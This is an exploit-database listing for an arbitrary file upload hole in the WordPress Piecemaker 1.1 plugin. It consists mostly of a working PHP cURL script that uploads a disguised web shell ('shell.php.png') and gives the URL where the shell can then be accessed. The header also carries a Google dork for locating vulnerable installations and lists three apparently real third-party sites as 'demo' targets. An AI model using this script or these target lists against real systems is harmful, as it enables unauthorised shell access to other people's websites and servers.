[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Wordpress Plugins - Piecemaker Arbitrary File Upload Vulnerability

Author
Ramzi Null
Risk
[
Security Risk High
]
0day-ID
0day-ID-18877
Category
web applications
Date add
30-06-2012
Platform
php
##########################################################################################
# Description : Wordpress Plugins - Piecemaker Arbitrary File Upload Vulnerability
# Version : 1.1
# Link : http://wordpress.org/extend/plugins/the-piecemaker/
# Plugins : http://downloads.wordpress.org/plugin/the-piecemaker.1.1.zip
# Date : 30-06-2012
# Google Dork : inurl:wp-content/plugins/piecemaker/
# Site : 1337day.com Inj3ct0r Exploit Database
# Tested on: win 7
# Demo site: http://www.eyespeek.com/photoandfilm/wp-content/plugins/piecemaker/php.php
#            http://dogschool.gr/wp-content/plugins/piecemaker/php.php
#            http://timesharelegal.net/wp-content/plugins/piecemaker/php.php
# Author : Ramzi Null
###########################################################################################

Exploit :

<?php
$uploadfile="shell.php.png";
$ch = curl_init("http://www.exemple.com/wordpress/wp-content/plugins/piecemaker/php.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
       array("theme[change_bouton_recherche]"=>"@$uploadfile",
              'submit'=>'submit'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access : http://www.exemple.com/wordpress/wp-content/plugins/piecemaker/uploads/shell.php.png

*******************
Greet To : Ned Null
*******************



#  0day.today [2024-12-25]  #